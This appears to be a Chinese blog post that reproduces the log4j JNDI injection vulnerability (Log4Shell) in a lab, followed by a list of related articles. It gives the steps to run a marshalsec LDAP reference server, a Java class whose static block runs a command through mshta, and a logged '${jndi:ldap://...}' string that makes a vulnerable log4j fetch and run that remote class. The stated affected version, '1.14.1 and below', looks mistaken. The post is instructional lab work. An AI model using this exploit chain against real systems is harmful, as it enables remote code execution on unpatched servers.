log4j漏洞,jndi侵入验证复现
log4j的1.14.1往下版本
需要先搭建一个LDAP服务器,git地址
git clone https://github.com/mbechler/marshalsec.git
执行 marshalsec.jndi.LDAPRefServer 的main函数,idea添加执行命令
"http://127.0.0.1/fileService/download/1/1/#test" 8888
意思是将文件服务器http://127.0.0.1/fileService/download/1/1/下面的test类,映射到8888端口
然后编写test类
public class test {static{try {Runtime.getRuntime().exec("cmd /c mshta vbscript:msgbox(\"有人从你的log4进来了\",64,\"来自熊猫头的消息\")(window.close)");} catch (IOException e) {e.printStackTrace();}}
}
test类执行了一个cmd指令,执行了一段vb程序语句
将他编译成class,放到文件服务器上,这里随便搭建什么文件服务器都行,给LDAP用。
我这边是用现有的外网远程服务器,http://127.0.0.1/fileService/download/1/1/
然后测试类
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;public class Main {private static final Logger log = LogManager.getLogger(Main.class);public static void main(String[] args) {String cmd = "${jndi:ldap://127.0.0.1:8888/test}";log.error(cmd);}
}
单你用log4j打印日志的时候,这日志写了几个jndi的命令,这就完蛋
log4j漏洞,jndi侵入验证复现相关推荐
- RMI、JNDI、LDAP介绍+log4j漏洞分析
介绍 本篇主要介绍java的RMI.JNDI.LDAP,在后面会详细分析log4j的jndi注入原理. 什么是RMI RMI全称是Remote Method Invocatioon,也就是远程方法调用 ...
- log4j漏洞原理分析复现检测复盘
凡事要自发,自然而为,即要顺从一切处于自然状态的事物,允许它们自发地转变.这样,道即达到了一种"无为而无不为"的状态.在日常生活中,道表现为"不自傲"或&quo ...
- 利用Vulhub复现log4j漏洞
Vulhub 搭建log4j漏洞环境,模拟攻击: 靶机: 首先进入log4j路径 cd vulhub/log4j/CVE-2021-44228/ 搭建环境 sudo docker-compose bu ...
- 如何跟踪log4j漏洞原理及发现绕WAF的tips
log4j漏洞的形成原因已经有很多分析文章了,这里说一说我是如何在了解到有漏洞后,跟进漏洞产生原理的,以及发现的一些绕WAF tips 跟进漏洞产生原因的思路 如何发现漏洞产生原因的 了解到log4j ...
- 升级过log4j,却还没搞懂log4j漏洞的本质?
摘要:log4j远程代码漏洞问题被大范围曝光后已经有一段时间了,今天完整讲清JNDI和RMI以及该漏洞的深层原因. 本文分享自华为云社区<升级过log4j,却还没搞懂log4j漏洞的本质?为你完 ...
- OpenShift Security (13) - 利用Log4j漏洞攻击容器
<OpenShift 4.x HOL教程汇总> 演示视频 利用 Log4j 漏洞攻击容器需要有2个条件,1)Java应用中包含受到漏洞影响的Log4j.2)带有"JNDI 注入& ...
- 深入解析著名的阿里云Log4j 漏洞
几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的. Apache Log4j2 是一个基于 ...
- 使用亚马逊云科技安全服务防御、检测和响应 Log4j 漏洞
概述 在本文中,我们将为针对最近披露的 Log4j 漏洞所影响的客户提供一些指导意见.内容包括如何限制漏洞的风险,如何尝试识别是否易受此问题影响,以及如何使用适当的补丁更新基础架构. Log4j 漏洞 ...
- 深入分析Log4j 漏洞
几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的. Apache Log4j2 是一个基于 ...
最新文章
- 如何用Python实现多任务版的udp聊天器
- Elasticsearch之倒排索引
- SDN你必须知道的十大问题——SDN有哪些开源项目
- Windows Azure Storage (19) 再谈Azure Block Blob和Page Blob
- [转载]Apache之Hadoop学习:初识hadoop
- Request/Response
- 判断字符串和数组是否为空
- 21个Docker 命令
- 高并发服务器开源项目,高并发服务器框架详解 - osc_qgfjs4a5的个人空间 - OSCHINA - 中文开源技术交流社区...
- IL -- 手动处理装箱Box
- EXCEL VBA编程入门三:VBA开发环境认识
- WIN7专业版32/64位更换系统语言注意
- C语言闰年还是平年问题程序,c语言判断一年是不是闰年,编程错在哪呢?
- 猿猿趴架构实战--03 什么是架构
- Kafka——Kafka的日志存储(5)
- 等比缩放公式_iPhone屏幕适配,等比缩放
- win7 eclipse调用虚拟机ubuntu部署的hadoop2.2.0伪分布(1)
- r语言软件GDINA_认知诊断分析系统(flexCDMs)设计及其实现
- 【运维面试】面试官:你觉得网站访问慢的原因有哪些?
- 图像的基本运算——scale, rotation, translation